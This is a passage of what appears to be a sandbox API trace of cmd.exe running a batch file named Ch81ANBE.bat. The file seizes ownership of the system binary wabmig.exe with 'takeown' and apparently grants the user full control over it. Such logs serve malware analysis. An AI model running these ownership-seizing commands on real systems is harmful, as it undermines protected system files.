lpValue=0x30e900, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30e840, lpPreviousValue=0x0) returned 1 [0184.407] GetStartupInfoW (in: lpStartupInfo=0x30e7fc | out: lpStartupInfo=0x30e7fc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0184.407] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0184.407] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Mail\\wabmig.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x30e89c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Mail\\wabmig.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30e8e8 | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Mail\\wabmig.exe\"", lpProcessInformation=0x30e8e8*(hProcess=0x78, hThread=0x74, dwProcessId=0x364, dwThreadId=0xa6c)) returned 1 [0184.422] CloseHandle (hObject=0x74) returned 1 [0184.422] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0184.422] GetProcessHeap () returned 0x590000 [0184.422] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ae8 | out: hHeap=0x590000) returned 1 [0184.422] GetEnvironmentStringsW () returned 0x5a5f80* [0184.422] GetProcessHeap () returned 0x590000 [0184.422] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb5c) returned 0x5a6ae8 [0184.422] FreeEnvironmentStringsW (penv=0x5a5f80) returned 1 [0184.422] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0187.719] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x30e7dc | out: lpExitCode=0x30e7dc*=0x0) returned 1 [0187.719] CloseHandle (hObject=0x78) returned 1 [0187.719] _vsnwprintf (in: _Buffer=0x30e924, _BufferCount=0x13, _Format="%08X", _ArgList=0x30e7e8 | out: _Buffer="00000000") returned 8 [0187.719] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0187.719] GetProcessHeap () returned 0x590000 [0187.719] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ae8 | out: hHeap=0x590000) returned 1 [0187.719] GetEnvironmentStringsW () returned 0x5a5f80* [0187.720] GetProcessHeap () returned 0x590000 [0187.720] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb5c) returned 0x5a6ae8 [0187.720] FreeEnvironmentStringsW (penv=0x5a5f80) returned 1 [0187.720] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0187.720] GetProcessHeap () returned 0x590000 [0187.720] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ae8 | out: hHeap=0x590000) returned 1 [0187.720] GetEnvironmentStringsW () returned 0x5a5f80* [0187.720] GetProcessHeap () returned 0x590000 [0187.720] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb5c) returned 0x5a6ae8 [0187.721] FreeEnvironmentStringsW (penv=0x5a5f80) returned 1 [0187.721] GetProcessHeap () returned 0x590000 [0187.721] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590ce8 | out: hHeap=0x590000) returned 1 [0187.721] DeleteProcThreadAttributeList (in: lpAttributeList=0x30e840 | out: lpAttributeList=0x30e840) [0187.721] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.721] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0188.763] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.764] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0188.764] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.764] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0188.765] SetConsoleInputExeNameW () returned 0x1 [0188.765] GetConsoleOutputCP () returned 0x1b5 [0188.765] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0188.765] SetThreadUILanguage (LangId=0x0) returned 0x409 [0188.765] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x30f05c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0188.766] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0188.767] _get_osfhandle (_FileHandle=3) returned 0x78 [0188.767] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0188.767] GetProcessHeap () returned 0x590000 [0188.767] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4918 | out: hHeap=0x590000) returned 1 [0188.767] GetProcessHeap () returned 0x590000 [0188.767] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a47e8 | out: hHeap=0x590000) returned 1 [0188.767] GetProcessHeap () returned 0x590000 [0188.767] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a46c0 | out: hHeap=0x590000) returned 1 [0188.767] GetProcessHeap () returned 0x590000 [0188.767] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a22f0 | out: hHeap=0x590000) returned 1 [0188.767] GetProcessHeap () returned 0x590000 [0188.767] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b2c10 | out: hHeap=0x590000) returned 1 [0188.767] GetProcessHeap () returned 0x590000 [0188.767] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a44a8 | out: hHeap=0x590000) returned 1 [0188.767] GetProcessHeap () returned 0x590000 [0188.768] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4428 | out: hHeap=0x590000) returned 1 [0188.768] GetProcessHeap () returned 0x590000 [0188.768] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a42f8 | out: hHeap=0x590000) returned 1 [0188.768] GetProcessHeap () returned 0x590000 [0188.768] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a41d0 | out: hHeap=0x590000) returned 1 [0188.768] GetProcessHeap () returned 0x590000 [0188.768] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4160 | out: hHeap=0x590000) returned 1 [0188.768] GetProcessHeap () returned 0x590000 [0188.768] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x591218 | out: hHeap=0x590000) returned 1 [0188.768] GetProcessHeap () returned 0x590000 [0188.768] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5760 | out: hHeap=0x590000) returned 1 [0188.768] GetProcessHeap () returned 0x590000 [0188.768] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5911b8 | out: hHeap=0x590000) returned 1 [0188.769] _get_osfhandle (_FileHandle=3) returned 0x78 [0188.769] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0188.769] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x30f040, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x30f040*=0xb3, lpOverlapped=0x0) returned 1 [0188.770] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0188.770] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0188.771] _get_osfhandle (_FileHandle=3) returned 0x78 [0188.771] GetFileType (hFile=0x78) returned 0x1 [0188.771] _get_osfhandle (_FileHandle=3) returned 0x78 [0188.771] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0188.771] GetProcessHeap () returned 0x590000 [0188.771] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5b4af8 [0188.772] GetProcessHeap () returned 0x590000 [0188.772] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x5c) returned 0x5911b8 [0188.772] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Mail\\wabmig.exe", nBufferLength=0x208, lpBuffer=0x30e7d0, lpFilePart=0x30e7c8 | out: lpBuffer="C:\\Program Files\\Windows Mail\\wabmig.exe", lpFilePart=0x30e7c8*="wabmig.exe") returned 0x28 [0188.772] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x30e4e4 | out: lpFindFileData=0x30e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x591220 [0188.772] FindClose (in: hFindFile=0x591220 | out: hFindFile=0x591220) returned 1 [0188.773] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0188.773] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail", lpFindFileData=0x30e4e4 | out: lpFindFileData=0x30e4e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xddb7c380, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddb7c380, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 0x591220 [0188.773] FindClose (in: hFindFile=0x591220 | out: hFindFile=0x591220) returned 1 [0188.773] _wcsnicmp (_String1="WINDOW~1", _String2="Windows Mail", _MaxCount=0xc) returned 11 [0188.773] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail\\wabmig.exe", lpFindFileData=0x30e4e4 | out: lpFindFileData=0x30e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf9da906, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xbf9da906, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xfa86dfb0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x10800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wabmig.exe", cAlternateFileName="")) returned 0x591220 [0188.774] FindClose (in: hFindFile=0x591220 | out: hFindFile=0x591220) returned 1 [0188.774] GetProcessHeap () returned 0x590000 [0188.774] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1e) returned 0x5a5838 [0188.774] GetProcessHeap () returned 0x590000 [0188.774] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4af8 | out: hHeap=0x590000) returned 1 [0188.777] _tell (_FileHandle=3) returned 63 [0188.777] _close (_FileHandle=3) returned 0 [0188.777] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x30ee14 | out: _Buffer="\r\n") returned 2 [0188.777] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.777] GetFileType (hFile=0x7) returned 0x2 [0188.778] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.778] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30edd4 | out: lpMode=0x30edd4) returned 1 [0188.778] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.778] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30ee00, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30ee00*=0x2) returned 1 [0188.779] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0188.779] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0188.779] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x30ee10 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0188.779] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x30ee10 | out: _Buffer=">") returned 1 [0188.779] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.779] GetFileType (hFile=0x7) returned 0x2 [0188.780] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.780] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30edd8 | out: lpMode=0x30edd8) returned 1 [0188.780] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.780] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x30ee04, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x30ee04*=0x26) returned 1 [0188.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.781] GetFileType (hFile=0x7) returned 0x2 [0188.781] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.781] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f05c | out: lpMode=0x30f05c) returned 1 [0188.782] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.782] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x590cf0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x30f088, lpReserved=0x0 | out: lpBuffer=0x590cf0*, lpNumberOfCharsWritten=0x30f088*=0x3) returned 1 [0188.782] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x30f094 | out: _Buffer=" FN=\"wabmig.exe\" ") returned 17 [0188.782] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.783] GetFileType (hFile=0x7) returned 0x2 [0188.783] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.783] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f054 | out: lpMode=0x30f054) returned 1 [0188.784] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.784] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x30f080, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f080*=0x11) returned 1 [0188.784] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x30f0b4 | out: _Buffer="\r\n") returned 2 [0188.784] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.785] GetFileType (hFile=0x7) returned 0x2 [0188.785] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.785] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f074 | out: lpMode=0x30f074) returned 1 [0188.785] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.785] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30f0a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f0a0*=0x2) returned 1 [0188.786] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0188.786] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0188.786] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0188.786] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0188.786] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0188.786] _wcsicmp (_String1="set", _String2="CD") returned 16 [0188.786] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0188.786] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0188.786] _wcsicmp (_String1="set", _String2="REN") returned 1 [0188.786] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0188.786] _wcsicmp (_String1="set", _String2="SET") returned 0 [0188.787] GetConsoleTitleW (in: lpConsoleTitle=0x30ec24, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.787] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0188.788] SetEnvironmentVariableW (lpName="FN", lpValue="\"wabmig.exe\"") returned 1 [0188.788] GetProcessHeap () returned 0x590000 [0188.788] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ae8 | out: hHeap=0x590000) returned 1 [0188.788] GetEnvironmentStringsW () returned 0x5a4bf8* [0188.788] GetProcessHeap () returned 0x590000 [0188.788] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb7c) returned 0x5a5f80 [0188.788] FreeEnvironmentStringsW (penv=0x5a4bf8) returned 1 [0188.788] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.788] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0188.789] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.789] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0188.789] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.789] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0188.789] SetConsoleInputExeNameW () returned 0x1 [0188.790] GetConsoleOutputCP () returned 0x1b5 [0188.790] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0188.790] SetThreadUILanguage (LangId=0x0) returned 0x409 [0188.790] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x30f05c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0188.791] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0188.791] _get_osfhandle (_FileHandle=3) returned 0x78 [0188.791] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0188.791] GetProcessHeap () returned 0x590000 [0188.791] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4198 | out: hHeap=0x590000) returned 1 [0188.791] GetProcessHeap () returned 0x590000 [0188.791] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4160 | out: hHeap=0x590000) returned 1 [0188.791] GetProcessHeap () returned 0x590000 [0188.791] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x591280 | out: hHeap=0x590000) returned 1 [0188.791] GetProcessHeap () returned 0x590000 [0188.791] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590ce8 | out: hHeap=0x590000) returned 1 [0188.791] GetProcessHeap () returned 0x590000 [0188.792] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x591220 | out: hHeap=0x590000) returned 1 [0188.792] GetProcessHeap () returned 0x590000 [0188.792] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5838 | out: hHeap=0x590000) returned 1 [0188.792] GetProcessHeap () returned 0x590000 [0188.792] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5911b8 | out: hHeap=0x590000) returned 1 [0188.792] _get_osfhandle (_FileHandle=3) returned 0x78 [0188.792] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0188.792] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x30f040, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x30f040*=0xa3, lpOverlapped=0x0) returned 1 [0188.792] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0188.792] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0188.793] _get_osfhandle (_FileHandle=3) returned 0x78 [0188.793] GetFileType (hFile=0x78) returned 0x1 [0188.793] _get_osfhandle (_FileHandle=3) returned 0x78 [0188.793] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0188.793] GetProcessHeap () returned 0x590000 [0188.793] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5b4af8 [0188.794] GetProcessHeap () returned 0x590000 [0188.794] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x70) returned 0x5911b8 [0188.794] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x30e7d0, lpFilePart=0x30e7c8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x30e7c8*="Ch81ANBE.bat") returned 0x32 [0188.794] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30e4e4 | out: lpFindFileData=0x30e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x591230 [0188.794] FindClose (in: hFindFile=0x591230 | out: hFindFile=0x591230) returned 1 [0188.794] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x30e4e4 | out: lpFindFileData=0x30e4e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x591230 [0188.794] FindClose (in: hFindFile=0x591230 | out: hFindFile=0x591230) returned 1 [0188.794] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0188.794] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x30e4e4 | out: lpFindFileData=0x30e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x591230 [0188.794] FindClose (in: hFindFile=0x591230 | out: hFindFile=0x591230) returned 1 [0188.794] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x30e4e4 | out: lpFindFileData=0x30e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x591230 [0188.795] FindClose (in: hFindFile=0x591230 | out: hFindFile=0x591230) returned 1 [0188.795] GetProcessHeap () returned 0x590000 [0188.795] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x56) returned 0x591230 [0188.795] GetProcessHeap () returned 0x590000 [0188.795] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4af8 | out: hHeap=0x590000) returned 1 [0188.797] _tell (_FileHandle=3) returned 78 [0188.797] _close (_FileHandle=3) returned 0 [0188.797] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x30ee14 | out: _Buffer="\r\n") returned 2 [0188.797] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.797] GetFileType (hFile=0x7) returned 0x2 [0188.799] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.799] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30edd4 | out: lpMode=0x30edd4) returned 1 [0188.799] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.799] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30ee00, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30ee00*=0x2) returned 1 [0188.800] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0188.800] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0188.800] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x30ee10 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0188.801] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x30ee10 | out: _Buffer=">") returned 1 [0188.801] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.801] GetFileType (hFile=0x7) returned 0x2 [0188.801] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.802] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30edd8 | out: lpMode=0x30edd8) returned 1 [0188.802] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.802] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x30ee04, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, 